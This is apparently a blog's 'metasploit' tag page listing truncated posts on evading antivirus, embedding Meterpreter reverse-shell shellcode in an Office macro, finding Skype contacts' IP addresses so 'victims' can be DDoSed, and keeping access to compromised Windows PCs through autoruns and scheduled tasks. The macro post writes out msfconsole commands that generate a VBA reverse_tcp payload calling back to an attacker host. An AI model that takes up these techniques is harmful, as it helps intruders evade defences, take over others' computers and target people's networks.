Showing posts with label metasploit. Show all posts
Showing posts with label metasploit. Show all posts
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List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.(1)Veil:-Veil...
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Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.msfconsoleuse payload/windows/meterpreter/reverse_tcpset LHOST LPORT 443generate -t vbaexploit Now we have generated our shellcode. Now we...
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Fun with skype resolver

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1Now chat with your victim; as soon as...
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Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever...
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Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But...